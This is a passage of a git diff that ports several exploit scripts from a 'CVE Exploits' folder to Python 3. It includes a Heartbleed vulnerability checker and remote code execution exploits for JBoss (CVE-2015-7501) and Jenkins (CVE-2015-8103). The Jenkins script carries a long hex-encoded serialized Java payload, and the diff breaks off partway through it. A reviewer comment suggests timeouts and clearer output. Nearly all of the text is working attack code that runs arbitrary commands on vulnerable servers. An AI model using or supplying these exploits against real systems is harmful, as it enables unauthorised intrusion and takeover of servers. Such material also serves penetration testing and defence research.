@@ -92,57 +95,57 @@ def recvall(s, length, timeout=5): def recvmsg(s): hdr = recvall(s, 5) if hdr is None: - print 'Unexpected EOF receiving record header - server closed connection' + print('Unexpected EOF receiving record header - server closed connection') return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: - print 'Unexpected EOF receiving record payload - server closed connection' + print('Unexpected EOF receiving record payload - server closed connection') return None, None, None - print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) + print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))) return typ, ver, pay def hit_hb(s, dumpf, host, quiet): while True: typ, ver, pay = recvmsg(s) if typ is None: - print 'No heartbeat response received from '+host+', server likely not vulnerable' + print('No heartbeat response received from '+host+', server likely not vulnerable') return False if typ == 24: - if not quiet: print 'Received heartbeat response:' + if not quiet: print('Received heartbeat response:') hexdump(pay, dumpf, quiet) if len(pay) > 3: - print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!' + print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!') else: - print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.' + print('Server '+host+' processed malformed heartbeat, but did not return any extra data.') return True if typ == 21: - if not quiet: print 'Received alert:' + if not quiet: print('Received alert:') hexdump(pay, dumpf, quiet) - print 'Server '+ host +' returned error, likely not vulnerable' + print('Server '+ host +' returned error, likely not vulnerable') return False def connect(host, port, quiet): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - if not quiet: print 'Connecting...' 
+ if not quiet: print('Connecting...') sys.stdout.flush() s.connect((host, port)) return s def tls(s, quiet): - if not quiet: print 'Sending Client Hello...' + if not quiet: print('Sending Client Hello...') sys.stdout.flush() s.send(hello) - if not quiet: print 'Waiting for Server Hello...' + if not quiet: print('Waiting for Server Hello...') sys.stdout.flush() def parseresp(s): while True: typ, ver, pay = recvmsg(s) if typ == None: - print 'Server closed connection without sending Server Hello.' + print('Server closed connection without sending Server Hello.') return 0 # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: @@ -156,10 +159,10 @@ def check(host, port, dumpf, quiet, starttls): s.ehlo() s.starttls() except smtplib.SMTPException: - print 'STARTTLS not supported...' + print('STARTTLS not supported...') s.quit() return False - print 'STARTTLS supported...' + print('STARTTLS supported...') s.quit() s = connect(host, port, quiet) s.settimeout(1) @@ -170,7 +173,7 @@ def check(host, port, dumpf, quiet, starttls): s.send('starttls\r\n') re = s.recv(1024) except socket.timeout: - print 'Timeout issues, going ahead anyway, but it is probably broken ...' + print('Timeout issues, going ahead anyway, but it is probably broken ...') tls(s,quiet) else: s = connect(host, port, quiet) @@ -179,13 +182,13 @@ def check(host, port, dumpf, quiet, starttls): version = parseresp(s) if version == 0: - if not quiet: print "Got an error while parsing the response, bailing ..." + if not quiet: print("Got an error while parsing the response, bailing ...") return False else: version = version - 0x0300 - if not quiet: print "Server TLS version was 1.%d\n" % version + if not quiet: print("Server TLS version was 1.%d\n" % version) - if not quiet: print 'Sending heartbeat request...' + if not quiet: print('Sending heartbeat request...') sys.stdout.flush() if (version == 1): s.send(hbv10) 
@@ -205,8 +208,8 @@ def main(): options.print_help() return - print 'Scanning ' + args[0] + ' on port ' + str(opts.port) - for i in xrange(0,opts.num): + print('Scanning ' + args[0] + ' on port ' + str(opts.port)) + for i in range(0,opts.num): check(args[0], opts.port, opts.file, opts.quiet, opts.starttls) if __name__ == '__main__': diff --git a/CVE Exploits/JBoss CVE-2015-7501.py b/CVE Exploits/JBoss CVE-2015-7501.py index e82ad23..2ee8edc 100644 --- a/CVE Exploits/JBoss CVE-2015-7501.py +++ b/CVE Exploits/JBoss CVE-2015-7501.py @@ -3,6 +3,7 @@ # Jboss Java Deserialization RCE (CVE-2015-7501) # Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -36,26 +37,26 @@ else: ysoserial_path = args.ysoserial_path if ysoserial_path is None: - print '[-] Could not find ysoserial JAR file' + print('[-] Could not find ysoserial JAR file') sys.exit(1) if len(args.target.split(":")) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) if r.status_code == 200: - print '[+] Command executed successfully' + print('[+] Command executed successfully') diff --git a/CVE Exploits/Jenkins CVE-2015-8103.py b/CVE Exploits/Jenkins CVE-2015-8103.py index 5419470..804736c 100644 --- a/CVE Exploits/Jenkins CVE-2015-8103.py 
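Review bot: The `requests.post(...)` call near the end of the `@@ -36,26 +37,26 @@` hunk has no `timeout=`, and the script prints a result only when `r.status_code == 200`. An unreachable host therefore blocks indefinitely, and any other status exits without output, which is easy to misread when the script is used to confirm a fix. A 200 from the servlet also does not by itself show that anything ran, so `[+] Command executed successfully` overstates what was observed. I would pass `timeout=10` to the call, add `else: print('[-] Unexpected HTTP status: {}'.format(r.status_code))`, and reword the success line to report the status only.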
+++ b/CVE Exploits/Jenkins CVE-2015-8103.py @@ -4,6 +4,7 @@ #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -39,24 +40,24 @@ else: ysoserial_path = args.ysoserial_path if ysoserial_path is None: - print "[-] Could not find ysoserial JAR file" + print("[-] Could not find ysoserial JAR file") sys.exit(1) if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) host, port = args.target.split(':') -print '[*] Target IP: {}'.format(host) -print '[*] Target PORT: {}'.format(port) -print '\n' +print('[*] Target IP: {}'.format(host)) +print('[*] Target PORT: {}'.format(port)) +print('\n') -print '[*] Retrieving the Jenkins CLI port' +print('[*] Retrieving the Jenkins CLI port') #Query Jenkins over HTTP to find what port the CLI listener is on r = requests.get('{}://{}:{}'.format(args.proto, host, port)) cli_port = int(r.headers['X-Jenkins-CLI-Port']) 
@@ -64,24 +65,24 @@ cli_port = int(r.headers['X-Jenkins-CLI-Port']) #Open a socket to the CLI port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host, cli_port) -print '[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port) +print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port)) sock.connect(server_address) # Send headers headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74' -print '[*] Sending headers' +print('[*] Sending headers') sock.send(headers) data = sock.recv(1024) -print '[*] Received "{}"'.format(data) +print('[*] Received "{}"'.format(data)) if data.find('JENKINS REMOTING CAPACITY') == -1: data = sock.recv(1024) - print '[*] Received "{}"'.format(data) + print('[*] Received "{}"'.format(data)) payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command]) payload_b64 = base64.b64encode(payloadObj) payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6
f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x6
1\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x2
0\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6
e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x7
3\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x0
0\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6
